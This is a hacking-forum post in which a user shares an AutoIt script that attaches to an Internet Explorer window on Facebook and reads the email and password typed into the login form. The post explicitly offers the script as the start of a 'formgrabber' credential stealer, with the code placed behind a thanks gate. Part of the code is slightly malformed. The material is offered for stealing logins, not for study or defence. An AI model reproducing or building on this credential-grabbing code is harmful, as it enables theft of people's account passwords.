• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

AutoIT IE Facebook GetObjByName

Status
Not open for further replies.

C.Oy

CoDDer
User
Joined
Feb 13, 2015
Messages
64
Reputation
0
Reaction score
479
Points
53
Credits
0
‎10 Years of Service‎
64%
Please note, if you want to make a deal with this user, that it is blocked.
A simple code to get email and password typed in internet explorer, you can create a "formgrabber" if you use the document event complete with some configured id's.




[HIDE-THANKS]

#include

$oIE = _IEAttach("https://www.facebook.com/", "url") ; attach the Script to read IE stuff !!



Local $oForm = _IEFormGetObjByName($oIE, "login_form") ; go to the LoginForm

Local $Email = _IEFormElementGetObjByName($oForm, "email") ; Read the email data
Local $Xtestre = _IEFormElementSetValue($oForm, "email")



Local $pass = _IEFormElementGetObjByName($oForm, "pass") ; Read the Password data

; Msgbox to show what it got :)
MsgBox(0, "Form info :p", "Email/Username :" & _IEFormElementGetValue($Email) & @CRLF & "Password :" &_IEFormElementGetValue($pass))​
Code:
>
[/HIDE-THANKS]




 
Status
Not open for further replies.
Back
Top